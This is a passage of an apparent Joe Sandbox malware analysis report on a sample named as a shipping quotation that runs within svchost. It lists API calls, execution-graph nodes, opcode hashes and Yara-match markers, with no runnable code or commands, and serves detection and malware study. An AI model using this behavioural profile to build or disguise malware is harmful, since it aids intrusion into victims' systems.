                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006C232C
                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006C233F
                                                                              • Part of subcall function 0069E97B: Sleep.KERNEL32 ref: 0069E9F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 27d0485336d071c785c834f50931a9cbea697d378de927f4b3d9c61e8013291b
                                                                            • Instruction ID: f092aa2d31d8191c396092296eea43bbfa7b530bf195eabc896d7c89a55b421e
                                                                            • Opcode Fuzzy Hash: 27d0485336d071c785c834f50931a9cbea697d378de927f4b3d9c61e8013291b
                                                                            • Instruction Fuzzy Hash: 83D01236794310B7E7A4B771DC0FFE67A1A9B00B24F01591AB74AEA1D0C9F5A801CB54
                                                                            Function 0066BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0066BE93
                                                                            • GetLastError.KERNEL32 ref: 0066BEA1
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0066BEFC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1717984340-0
                                                                            • Opcode ID: 34d95577b3b617b8e3f25b4d7858bb3c885f0cbd48d0a7b2aa2a7ca62fdfb667
                                                                            • Instruction ID: 5701fe99abf79964a85493bbb1c67b226b5e9820d0feb0eb6a4c47cbd2364c09
                                                                            • Opcode Fuzzy Hash: 34d95577b3b617b8e3f25b4d7858bb3c885f0cbd48d0a7b2aa2a7ca62fdfb667
                                                                            • Instruction Fuzzy Hash: D041D435600246EFCF218FA5CC54AFA7BA7AF41360F14A169F959D72B1DB318D81CB60

                                                                            Execution Graph

                                                                            Execution Coverage:1.2%
                                                                            Dynamic/Decrypted Code Coverage:5.9%
                                                                            Signature Coverage:8.6%
                                                                            Total number of Nodes:152
                                                                            Total number of Limit Nodes:12
                                                                            execution_graph 94731 4250c3 94735 4250dc 94731->94735 94732 425169 94733 425127 94739 42eaf3 94733->94739 94735->94732 94735->94733 94737 425164 94735->94737 94738 42eaf3 RtlFreeHeap 94737->94738 94738->94732 94742 42cd83 94739->94742 94741 425134 94743 42cda0 94742->94743 94744 42cdad RtlFreeHeap 94743->94744 94744->94741 94755 42ebd3 94758 42cd43 94755->94758 94757 42ebee 94759 42cd5d 94758->94759 94760 42cd6a RtlAllocateHeap 94759->94760 94760->94757 94884 42c063 94885 42c07d 94884->94885 94888 3972d10 LdrInitializeThunk 94885->94888 94886 42c0a1 94888->94886 94904 424d33 94905 424d4f 94904->94905 94906 424d77 94905->94906 94907 424d8b 94905->94907 94908 42ca33 NtClose 94906->94908 94909 42ca33 NtClose 94907->94909 94910 424d80 94908->94910 94911 424d94 94909->94911 94914 42ec13 RtlAllocateHeap 94911->94914 94913 424d9f 94914->94913 94915 42fbf3 94916 42eaf3 RtlFreeHeap 94915->94916 94917 42fc08 94916->94917 94918 42eab3 94921 42cc63 94918->94921 94922 42cc7d 94921->94922 94925 3972eb0 LdrInitializeThunk 94922->94925 94923 42cca5 94925->94923 94745 414303 94746 41430c 94745->94746 94751 417ad3 94746->94751 94748 41433b 94749 414380 94748->94749 94750 41436f PostThreadMessageW 94748->94750 94750->94749 94752 417af7 94751->94752 94753 417afe 94752->94753 94754 417b36 LdrLoadDll 94752->94754 94753->94748 94754->94753 94761 41a893 94762 41a905 94761->94762 94763 41a8ab 94761->94763 94763->94762 94765 41e7f3 94763->94765 94766 41e819 94765->94766 94770 41e910 94766->94770 94771 42fc33 RtlAllocateHeap RtlFreeHeap 94766->94771 94768 41e8ae 94768->94770 94772 42c0b3 94768->94772 94770->94762 94771->94768 94773 42c0d0 94772->94773 94776 3972b2a 94773->94776 94774 42c0f8 94774->94770 94777 3972b31 94776->94777 94778 3972b3f LdrInitializeThunk 94776->94778 94777->94774 94778->94774 94779 3972a80 LdrInitializeThunk 94780 419098 94783 42ca33 94780->94783 94782 4190a2 94784 42ca4d 94783->94784 94785 42ca5a NtClose 94784->94785 94785->94782 94889 415ceb 94892 419843 94889->94892 94891 415d16 94893 419876 94892->94893 94894 41989a 94893->94894 94899 42c5b3 94893->94899 94894->94891 94896 42ca33 NtClose 94898 41993d 94896->94898 94897 4198bd 94897->94894 94897->94896 94898->94891 94900 42c5d0 94899->94900 94903 3972bc0 LdrInitializeThunk 94900->94903 94901 42c5f8 94901->94897 94903->94901 94786 401b9d 94787 401bc7 94786->94787 94790 430063 94787->94790 94793 42e6a3 94790->94793 94794 42e6c9 94793->94794 94805 407463 94794->94805 94796 42e6df 94804 401c11 94796->94804 94808 41b3f3 94796->94808 94798 42e6fe 94802 42e713 94798->94802 94823 42cdd3 94798->94823 94801 42e72d 94803 42cdd3 ExitProcess 94801->94803 94819 428603 94802->94819 94803->94804 94807 407470 94805->94807 94826 416793 94805->94826 94807->94796 94809 41b41f 94808->94809 94837 41b2e3 94809->94837 94812 41b464 94815 41b480 94812->94815 94817 42ca33 NtClose 94812->94817 94813 41b44c 94814 41b457 94813->94814 94816 42ca33 NtClose 94813->94816 94814->94798 94815->94798 94816->94814 94818 41b476 94817->94818 94818->94798 94820 428665 94819->94820 94822 428672 94820->94822 94848 418943 94820->94848 94822->94801 94824 42cdf0 94823->94824 94825 42ce01 ExitProcess 94824->94825 94825->94802 94827 4167b0 94826->94827 94829 4167c5 94827->94829 94830 42d483 94827->94830 94829->94807 94832 42d49d 94830->94832 94831 42d4cc 94831->94829 94832->94831 94833 42c0b3 LdrInitializeThunk 94832->94833 94834 42d528 94833->94834 94835 42eaf3 RtlFreeHeap 94834->94835 94836 42d541 94835->94836 94836->94829 94838 41b3d9 94837->94838 94839 41b2fd 94837->94839 94838->94812 94838->94813 94843 42c153 94839->94843 94842 42ca33 NtClose 94842->94838 94844 42c170 94843->94844 94847 39734e0 LdrInitializeThunk 94844->94847 94845 41b3cd 94845->94842 94847->94845 94849 41896d 94848->94849 94855 418e7b 94849->94855 94856 413f73 94849->94856 94851 418a9a 94852 42eaf3 RtlFreeHeap 94851->94852 94851->94855 94853 418ab2 94852->94853 94854 42cdd3 ExitProcess 94853->94854 94853->94855 94854->94855 94855->94822 94860 413f93 94856->94860 94858 413ffc 94858->94851 94860->94858 94861 41b703 94860->94861 94862 41b728 94861->94862 94868 429da3 94862->94868 94864 413ff2 94864->94851 94866 41b759 94866->94864 94867 42eaf3 RtlFreeHeap 94866->94867 94873 41b543 LdrInitializeThunk 94866->94873 94867->94866 94869 429e08 94868->94869 94870 429e3b 94869->94870 94874 413dd3 94869->94874 94870->94866 94872 429e1d 94872->94866 94873->94866 94875 413da0 94874->94875 94877 413e0d 94874->94877 94875->94877 94879 42ccb3 94875->94879 94877->94872 94880 42cccd 94879->94880 94883 3972b90 LdrInitializeThunk 94880->94883 94881 413db5 94881->94872 94883->94881

                                                                            Executed Functions

                                                                            Function 00417AD3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 230 417ad3-417aef 231 417af7-417afc 230->231 232 417af2 call 42f6d3 230->232 233 417b02-417b10 call 42fcd3 231->233 234 417afe-417b01 231->234 232->231 237 417b20-417b31 call 42e173 233->237 238 417b12-417b1d call 42ff73 233->238 243 417b33-417b47 LdrLoadDll 237->243 244 417b4a-417b4d 237->244 238->237 243->244
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                            • Instruction ID: 683b89875a7fb83d71da6e1f8a97b79be180c124f2fa609aa3b8b71e39b295bb
                                                                            • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                            • Instruction Fuzzy Hash: F7011EB5E4420DBBDB10DAA5DC42FDEB378AB54308F4041AAE90897240F635EB588B95
                                                                            Function 0042CA33 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 256 42ca33-42ca68 call 404803 call 42dc73 NtClose
                                                                            APIs
                                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA63
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
                                                                            • Instruction ID: 50a5b69ca1682e878e5a40afd65bd8ed1634e2dbd60f648430f8de340d975e9a
                                                                            • Opcode Fuzzy Hash: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
                                                                            • Instruction Fuzzy Hash: B5E08C763402147BE720FB5AEC42F9B776CDFC5710F10852AFA08A7281C6B4B90186F8
                                                                            Function 03972B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 271 3972b90-3972b9c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4130a1a1b51de9525d6e53c7c94bc4595027a6085df348630190a858099733a3
                                                                            • Instruction ID: e45d0fe22c788bacbe084dbb98841b6a451e4a5d83bfbc5857bf7de434ad924e
                                                                            • Opcode Fuzzy Hash: 4130a1a1b51de9525d6e53c7c94bc4595027a6085df348630190a858099733a3
                                                                            • Instruction Fuzzy Hash: 2590023120518C42D510B358850474A005587D0301F95CC15A4514658DC7A588917131
                                                                            Function 03972BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 51f53d4e610417d32e69badea9399a1c2c64b153fbf5023020c8f22f56da74f5
                                                                            • Instruction ID: 78f39144826e440b3a9c958a1bd044bf2c3046549f54a2fdd2aa6d90c20d613a
                                                                            • Opcode Fuzzy Hash: 51f53d4e610417d32e69badea9399a1c2c64b153fbf5023020c8f22f56da74f5
                                                                            • Instruction Fuzzy Hash: 7690023120510842D500B7985508646005587E0301F91D815A5114555EC77588917131
                                                                            Function 03972A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 270 3972a80-3972a8c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d0c9ecf8ee937ac4fc1c7152133b1d058518fd828f96ddf5bde269291513766d
                                                                            • Instruction ID: 78a42a5041fe1570410297363235fbea520bec92c96e7630e2125c2dcdfb6669
                                                                            • Opcode Fuzzy Hash: d0c9ecf8ee937ac4fc1c7152133b1d058518fd828f96ddf5bde269291513766d
                                                                            • Instruction Fuzzy Hash: 6C900261206104434505B3584514616405A87E0201B91C825E1104590DC63588917135
                                                                            Function 03972EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 128491d48295857a45996991d5416cb9f9aa4ec36b2a05b0364400aaa67c3593
                                                                            • Instruction ID: 9f8845f36518100394076d4851fa51b7f32a1826626e0904142ccbc35d814fa6
                                                                            • Opcode Fuzzy Hash: 128491d48295857a45996991d5416cb9f9aa4ec36b2a05b0364400aaa67c3593
                                                                            • Instruction Fuzzy Hash: D290023120550842D500B358491470B005587D0302F91C815A1254555DC73588517571
                                                                            Function 03972D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 895d4f058e58c6362fc6bdd8894c04ff933080f8bf4e4297236bd7150eedece8
                                                                            • Instruction ID: 8f7692ea395c2cbaaf50030c822096d07a6c7b3916101754a4e3b8f0fe4ce40c
                                                                            • Opcode Fuzzy Hash: 895d4f058e58c6362fc6bdd8894c04ff933080f8bf4e4297236bd7150eedece8
                                                                            • Instruction Fuzzy Hash: 9690023120510853D511B3584604707005987D0241FD1CC16A0514558DD7668952B131
                                                                            Function 039734E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d609b1f5fa4ee78387e92230a696af2939aab473da0f01d4d9d4d940d52bd9a2
                                                                            • Instruction ID: 5c35f8c901e8b0550cfc1d727683e05a452642d2ea29ba4a5b6c15f4f3f27659
                                                                            • Opcode Fuzzy Hash: d609b1f5fa4ee78387e92230a696af2939aab473da0f01d4d9d4d940d52bd9a2
                                                                            • Instruction Fuzzy Hash: F090023160920842D500B3584614706105587D0201FA1CC15A0514568DC7A5895175B2
                                                                            Function 004142FB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: b427-I_1$b427-I_1
                                                                            • API String ID: 1836367815-3731361855
                                                                            • Opcode ID: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
                                                                            • Instruction ID: 1c1b804c52c0fa2fc79735cf8757f94194e925b2cf622f9804a62bf2283c9d4a
                                                                            • Opcode Fuzzy Hash: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
                                                                            • Instruction Fuzzy Hash: 4001A5B2D4111CBAEB119AD19D82DEFBB7CDF40398F00816AFA1467141D6784E468BA5
                                                                            Function 00414303 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: b427-I_1$b427-I_1
                                                                            • API String ID: 1836367815-3731361855
                                                                            • Opcode ID: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
                                                                            • Instruction ID: 66382633165677f4d287f1c9305a2e0242bca7fee9ac24ed2ff299bc6a34d21b
                                                                            • Opcode Fuzzy Hash: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
                                                                            • Instruction Fuzzy Hash: 9401D6B2E4021CBADB10AAE19C82DEFBB7CDF40798F008169FA1467141D6785E068BB5
                                                                            Function 004142CD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: b427-I_1$b427-I_1
                                                                            • API String ID: 1836367815-3731361855
                                                                            • Opcode ID: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
                                                                            • Instruction ID: e66581b55692d0f67d3645e7f83c5c9d5bac99b1c31a45c43741cea5d306e683
                                                                            • Opcode Fuzzy Hash: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
                                                                            • Instruction Fuzzy Hash: C301B5B2E4021CBADB119BD19C81DEFBB7CDF80398F00816AFA2467141D67C4E468BA5
                                                                            Function 00417B83 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 216 417b83-417b87 217 417b89-417ba2 216->217 218 417b6f 216->218 221 417ba4-417be0 217->221 222 417b5f-417b62 217->222 219 417b71-417b7f 218->219 220 417b36-417b47 LdrLoadDll 218->220 226 417b81-417b82 219->226 227 417bfd-417c19 219->227 224 417b4a-417b4d 220->224 228 417be2-417bf3 221->228 229 417bf4-417c19 221->229 228->229
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
                                                                            • Instruction ID: 5fe7b0e3159e894076f386ae4157a7bafd75539a6ed586e2fa135baba6e0e4fa
                                                                            • Opcode Fuzzy Hash: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
                                                                            • Instruction Fuzzy Hash: 7E21683192D2449FDB21CA75C9866E4BB74FB9A725F1406CBD091CF242D335AC8AC784
                                                                            Function 0042CD43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 246 42cd43-42cd80 call 404803 call 42dc73 RtlAllocateHeap
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,0041E8AE,?,?,00000000,?,0041E8AE,?,?,?), ref: 0042CD7B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
                                                                            • Instruction ID: f9903ddc43aa1d478041010c95bd812e84ae6d930a69b2ca5004dc81876241ec
                                                                            • Opcode Fuzzy Hash: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
                                                                            • Instruction Fuzzy Hash: F3E092B1200204BBD710EF49EC41F9B77ACEFC5750F108419FD08A7241D670B910CAB8
                                                                            Function 0042CD83 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 251 42cd83-42cdc3 call 404803 call 42dc73 RtlFreeHeap
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0B05C6C1,00000007,00000000,00000004,00000000,00417355,000000F4), ref: 0042CDBE
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
                                                                            • Instruction ID: 9d094757069ee7fafe8343a4ae1169e8157d0d769102895cf672c55cae1e0208
                                                                            • Opcode Fuzzy Hash: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
                                                                            • Instruction Fuzzy Hash: 7AE092B52002147BDB10EE4ADC41F9B33ACEFC5710F004419FD08A7241C6B0B9108AB8
                                                                            Function 0042CDD3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 261 42cdd3-42ce0f call 404803 call 42dc73 ExitProcess
                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,3D88789B,?,?,3D88789B), ref: 0042CE0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: d4e777c894d90f951efbef4aca7f82a43814a062413fce3ac0bea4ee7a49ce04
                                                                            • Instruction ID: 98d1125bebf2f9484b9d6ff066c81308abae10eb618a57f9fb154900a1da49d8
                                                                            • Opcode Fuzzy Hash: d4e777c894d90f951efbef4aca7f82a43814a062413fce3ac0bea4ee7a49ce04
                                                                            • Instruction Fuzzy Hash: 40E04F7A2102147BD210BA5ADC01F97776CDFC5714F10446AFA1867241C6B17A01C6F4
                                                                            Function 03972B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 266 3972b2a-3972b2f 267 3972b31-3972b38 266->267 268 3972b3f-3972b46 LdrInitializeThunk 266->268
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c26275a14d3245cd4254186cf3a7c1328f9b5b31a3fd49ff4f58df7e9fe53008
                                                                            • Instruction ID: 7e8482144cab2ab82568f0e71b996d89023cf7ed2fb70e55a3a83dc38b570a40
                                                                            • Opcode Fuzzy Hash: c26275a14d3245cd4254186cf3a7c1328f9b5b31a3fd49ff4f58df7e9fe53008
                                                                            • Instruction Fuzzy Hash: DDB02B318010C5C5DE00E720070C7073A04A7C0300F25C852D1420240F8338C080F131

